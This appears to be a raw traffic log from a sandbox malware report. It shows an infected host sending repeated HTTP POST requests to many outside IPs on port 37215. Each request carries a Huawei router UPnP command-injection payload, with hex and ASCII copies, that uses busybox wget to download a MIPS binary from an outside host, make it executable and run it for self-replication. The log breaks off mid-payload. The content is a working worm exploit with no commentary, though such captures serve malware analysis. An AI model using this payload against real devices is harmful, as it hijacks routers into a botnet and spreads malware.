                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          594192.168.2.1547018197.130.61.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623421907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          595192.168.2.1550600157.105.80.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623449087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          596192.168.2.1544888197.205.80.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623507977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          597192.168.2.1548730157.191.226.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.627861023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          598192.168.2.1533342197.2.159.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.587996960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          599192.168.2.1549802177.246.162.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.588027000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          600192.168.2.155064096.167.185.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.596594095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          601192.168.2.155997895.217.88.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604239941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          602192.168.2.153822041.238.120.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604259968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          603192.168.2.154420441.118.144.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604286909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 